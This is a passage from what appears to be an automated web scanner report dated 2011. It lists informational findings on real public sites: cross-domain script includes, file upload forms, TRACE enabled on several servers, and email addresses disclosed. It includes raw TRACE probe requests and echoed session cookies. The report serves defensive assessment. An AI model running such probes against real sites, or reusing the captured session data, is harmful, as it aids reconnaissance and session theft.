Date: Fri, 24 Jun 2011 13:22:23 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 31599
Set-Cookie: JSESSIONID=B277BFEFC6287630084D8F375D858853; Path=/
Cache-Control: max-age=0
Expires: Fri, 24 Jun 2011 13:22:22 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="htt
...[SNIP]...
</a>
    <script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=j0hnsmith" type="text/javascript"></script>
...[SNIP]...
</div>
    <script src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</div>


    <script type="text/javascript" src="http://static.asiawebdirect.com/premium/js/premium-hotel-scripts.jsi"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script src="http://static.asiawebdirect.com/premium/js/s_code.js"></script>
...[SNIP]...
19.52. http://www.phuket.com/islands/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phuket.com
Path:   /islands/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /islands/index.htm HTTP/1.1
Host: www.phuket.com
Proxy-Connection: keep-alive
Referer: http://phuket.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=59015276.1308921639.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=59015276.1300501793.1308921638.1308921638.1308921638.1; __utmc=59015276; __utmb=59015276.1.10.1308921638; s_sq=wotifcom-awd-global-prd%2Cwotifcom-awd-phuket-prd%3D%2526pid%253Dphuket.com%25253Ahomepage%25253Athailand%25253Aphuket%25253Aphuket.com%252520home%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.phuket.com/islands/index.htm%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:41 GMT
Server: Apache-Coyote/1.1
Pragma:
Cache-Control: max-age=86400, public
Expires: Sat, 25 Jun 2011 13:20:42 GMT
Vary: Accept-Encoding,User-Agent
Last-Modified: Thu, 11 Feb 2010 14:13:34 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 239239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                                               <html xmlns="http://www.w3.org/1999/x
...[SNIP]...
</script>

<script type='text/javascript' src='http://d1.openx.org/spcjs.php?id=5242&amp;block=1'></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>

<script type='text/javascript' src='http://d1.openx.org/spcjs.php?id=5242&amp;block=1'></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...
</a>
               <script src="http://s7.addthis.com/js/152/addthis_widget.js" type="text/javascript"></script>
...[SNIP]...
<![endif]-->

   <script type="text/javascript" src="http://static.asiawebdirect.com/portals/js/portals-scripts.jsi"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com -->
<script language="JavaScript" type="text/javascript" src="http://static.asiawebdirect.com/premium/js/s_code.js"></script>
...[SNIP]...
19.53. http://www.silobreaker.com/ShowWidget.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silobreaker.com
Path:   /ShowWidget.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ShowWidget.aspx?control=MiniHotSpots&Width=300&Height=150&boxed=true&QGHASH0=-483885626&QF2DrillDownItems=16_2264342118916948046 HTTP/1.1
Host: www.silobreaker.com
Proxy-Connection: keep-alive
Referer: http://www.silobreaker.com/spil-games-selects-adyens-internet-payment-system-for-global-social-5_2264343625376727174
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1308922014.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1106024623.1308922014.1308922014.1308922014.1; __utmc=1; __utmb=1.3.8.1308922022744; __gads=ID=e67454674848fabd:T=1308922022:S=ALNI_MbORhtKYXrcUEikXP4g4B8c3Jncyg

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=6899
Content-Type: text/html; charset=utf-8
Expires: Fri, 24 Jun 2011 15:27:05 GMT
Last-Modified: Fri, 24 Jun 2011 13:27:05 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 24 Jun 2011 13:32:05 GMT
Content-Length: 3259


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><title>
   
...[SNIP]...
</title>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>
...[SNIP]...
</script>


<script src="http://cache.sbstatic.com/UniqueResources/2011617-1370.js" type="text/javascript"></script>
...[SNIP]...
19.54. http://www.silobreaker.com/spil-games-selects-adyens-internet-payment-system-for-global-social-5_2264343625376727174  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silobreaker.com
Path:   /spil-games-selects-adyens-internet-payment-system-for-global-social-5_2264343625376727174

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /spil-games-selects-adyens-internet-payment-system-for-global-social-5_2264343625376727174 HTTP/1.1
Host: www.silobreaker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 24 Jun 2011 13:31:03 GMT
Content-Length: 76267


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1">
<!-- google_a
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<link href="http://cache.sbstatic.com/UniqueResources/2011617-1370.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=false"></script>


<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.4/jquery-ui.min.js"></script>
...[SNIP]...
</script>


<script src="http://cache.sbstatic.com/UniqueResources/2011617-1370.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
19.55. http://www.telkomsel.com/product/blackberry/550-Paket-BlackBerry-Pilihan.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.telkomsel.com
Path:   /product/blackberry/550-Paket-BlackBerry-Pilihan.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /product/blackberry/550-Paket-BlackBerry-Pilihan.html HTTP/1.1
Host: www.telkomsel.com
Proxy-Connection: keep-alive
Referer: http://www.telkomsel.com/product/blackberry/674-Blackberry-Enterprise-Service.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fafdd737f01cf9ce82c539fcf7eb71a7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221308921695%22%3Bs%3A8%3A%22language%22%3Bs%3A2%3A%22ID%22%3B%7D374344fdcb3fa1d5ac3d88c66037bbbb; PHPSESSID=4d70f11bd291a408d8bc49f1e6b3a975; __utmz=80575250.1308921411.1.1.utmcsr=beta.telkom.co.id|utmccn=(referral)|utmcmd=referral|utmcct=/rss/SimplePie/index.php; __utma=80575250.1631938963.1308921411.1308921411.1308921411.1; __utmc=80575250; __utmb=80575250.1.10.1308921411

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 Jun 2011 13:22:40 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 101727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
       <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"
type="text/javascript">
</script>
...[SNIP]...
19.56. http://www.telkomsel.com/product/blackberry/undefined  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.telkomsel.com
Path:   /product/blackberry/undefined

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /product/blackberry/undefined HTTP/1.1
Host: www.telkomsel.com
Proxy-Connection: keep-alive
Referer: http://www.telkomsel.com/product/blackberry/674-Blackberry-Enterprise-Service.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22fafdd737f01cf9ce82c539fcf7eb71a7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221308921695%22%3Bs%3A8%3A%22language%22%3Bs%3A2%3A%22ID%22%3B%7D374344fdcb3fa1d5ac3d88c66037bbbb; PHPSESSID=4d70f11bd291a408d8bc49f1e6b3a975

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 24 Jun 2011 13:21:55 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 96122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
       <script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share"
type="text/javascript">
</script>
...[SNIP]...
20. File upload functionality  previous  next
There are 2 instances of this issue:

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:

20.1. http://mediacdn.disqus.com/1308858010/build/system/upload.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1308858010/build/system/upload.html

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /1308858010/build/system/upload.html HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1937626060-1305368047702; disqus_unique=525920122861; __utmz=113869458.1308705797.10.10.utmcsr=thepostgame.com|utmccn=(referral)|utmcmd=referral|utmcct=/blog/style-points/201106/coolest-features-athletes-homes; __utma=113869458.981292312.1305368048.1308571889.1308705797.10

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 23 Jun 2011 19:45:55 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 13745
X-Varnish: 2045866956
Cache-Control: max-age=2529241
Expires: Sat, 23 Jul 2011 20:05:24 GMT
Date: Fri, 24 Jun 2011 13:31:23 GMT
Connection: close

<html>
<head>
<meta charset="utf-8">
<title></title>
<script>document.domain = 'disqus.com';</script>


<style type="text/css">
html,body,div,span,applet,object,ifram
...[SNIP]...
<!-- dynamic -->
<input type="file" name="attachment" onchange="mediaUploadRpc.onUploadStart();this.parentNode.submit();" />
<input type="hidden" name="id" value="" />
...[SNIP]...
20.2. http://videogamevoters.org/page/s/raiseyourvoice  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://videogamevoters.org
Path:   /page/s/raiseyourvoice

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /page/s/raiseyourvoice HTTP/1.1
Host: videogamevoters.org
Proxy-Connection: keep-alive
Referer: http://videogamevoters.org/eacorp/?topicId=11341
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jljaemke=B82E653654DADA390F78AB527FA85CD6; exp_last_visit=993577424; __utmz=27825467.1308923027.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27825467.253868994.1308923027.1308923027.1308923027.1; __utmc=27825467; __utmb=27825467.1.10.1308923027; mw-sc-soon=visited; exp_last_activity=1308937427; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fmodal%2Fsc-soon%2F%22%3B%7D; X-CheckNode=

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Fri, 24 Jun 2011 13:44:04 GMT
X-BSD: cached
Set-Cookie: X-CheckNode=; domain=videogamevoters.org; path=/
Content-Length: 16415


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...
<div class="input"><input id="custom-39" name="custom-39" type="file" /></div>
...[SNIP]...
21. TRACE method is enabled  previous  next
There are 7 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

21.1. http://beta.telkom.co.id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /

Request

TRACE / HTTP/1.0
Host: beta.telkom.co.id
Cookie: 8590953b24da63d0

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:16:09 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: beta.telkom.co.id
Cookie: 8590953b24da63d0; TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.130
...[SNIP]...
21.2. http://d1.openx.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /

Request

TRACE / HTTP/1.0
Host: d1.openx.org
Cookie: 4fcd5780aa272564

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:36 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: d1.openx.org
Cookie: 4fcd5780aa272564; OAID=62614e7a17a25044ace97fcfa762d977; OACCAP=86574.1
Connection: close
X-Forwarded-For: 173.193.214.243, 10.1.253.2

21.3. http://sales.swsoft.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.swsoft.com
Path:   /

Request

TRACE / HTTP/1.0
Host: sales.swsoft.com
Cookie: 2f20b9aac164141e

Response

HTTP/1.1 200 OK
Date: Sat, 25 Jun 2011 02:10:48 GMT
Server: Apache/2.0.51 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sales.swsoft.com
Cookie: 2f20b9aac164141e; PHPSESSID=4f82c095e61a7a81c4b3c405d9468027

21.4. https://shop.marketplace.parallels.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shop.marketplace.parallels.com
Path:   /

Request

TRACE / HTTP/1.0
Host: shop.marketplace.parallels.com
Cookie: 6c25d901efeb6f16

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:56:11 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: shop.marketplace.parallels.com
Cookie: 6c25d901efeb6f16; PHPSESSID=41b3aa8f60450684cc9c47ad0f2cd160; aspcms_sid=d7aaa062b220f34045ee842b61dd35f8; __utmz=1.1306243398.5.3.utmcsr=webmail.nosedivesailing.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/
...[SNIP]...
21.5. https://softlayer.parallelsmarketplace.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://softlayer.parallelsmarketplace.com
Path:   /

Request

TRACE / HTTP/1.0
Host: softlayer.parallelsmarketplace.com
Cookie: e8c77ff29738355f

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:45:21 GMT
Server: Apache/2.2.11 (Unix) PHP/4.4.9 mod_ssl/2.2.11 OpenSSL/0.9.8b
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: softlayer.parallelsmarketplace.com
Cookie: e8c77ff29738355f; PHPSESSID=6a9429b7d6c03539695bbec853449bea

21.6. http://www.addthis.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.addthis.com
Cookie: 86fbcd5c43577cc3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:18:52 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.addthis.com
Cookie: 86fbcd5c43577cc3; Coyote-2-a0f0083=a0f02a8:0; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; uid=4dce8a530508b02d; psc=3; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308921530.3
...[SNIP]...
21.7. http://www.parallels.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.parallels.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.parallels.com
Cookie: 26bd1fe6d6f8a38d

Response

HTTP/1.0 200 OK
Date: Sat, 25 Jun 2011 02:10:48 GMT
Server: Apache/2.2.3 (CentOS)
Content-Type: message/http
X-Cache: MISS from www.parallels.com
X-Cache-Lookup: NONE from www.parallels.com:80
Connection: close

TRACE / HTTP/1.0
Host: www.parallels.com
Cookie: 26bd1fe6d6f8a38d; aspcms_sid=d7aaa062b220f34045ee842b61dd35f8; __utmz=1.1306243398.5.3.utmcsr=webmail.nosedivesailing.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/portal/sidebar.php; __utma=1.1253792871.1305
...[SNIP]...
22. Email addresses disclosed  previous  next
There are 42 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

22.1. http://beta.telkom.co.id/info-perusahaan/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /info-perusahaan/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /info-perusahaan/ HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.2.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:16:29 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 103865
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>Profil
...[SNIP]...
<br>email : info@tii.co.id</font>
...[SNIP]...
<br>email : mitratel@mitratel.co.id</font>
...[SNIP]...
22.2. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html

Issue detail

The following email address was disclosed in the response:

Request

GET /pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.4.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:17:50 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 31251
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
<br />e-mail : aginasf@telkom.co.id <br />
...[SNIP]...
22.3. http://beta.telkom.co.id/products-services/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.telkom.co.id
Path:   /products-services/index.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /products-services/index.html?lid=en HTTP/1.1
Host: beta.telkom.co.id
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/produk-layanan/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TelkomSess=4f8ce7049c296d6c7305da6d3e3a3e10; __utmz=201915906.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=1.1308921355.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1785486320.1308921355.1308921355.1308921355.1; __utmc=1; __utmb=1.1.10.1308921355; __utma=201915906.1604838393.1308921355.1308921355.1308921355.1; __utmc=201915906; __utmb=201915906.5.10.1308921355

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:20:27 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 466921
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
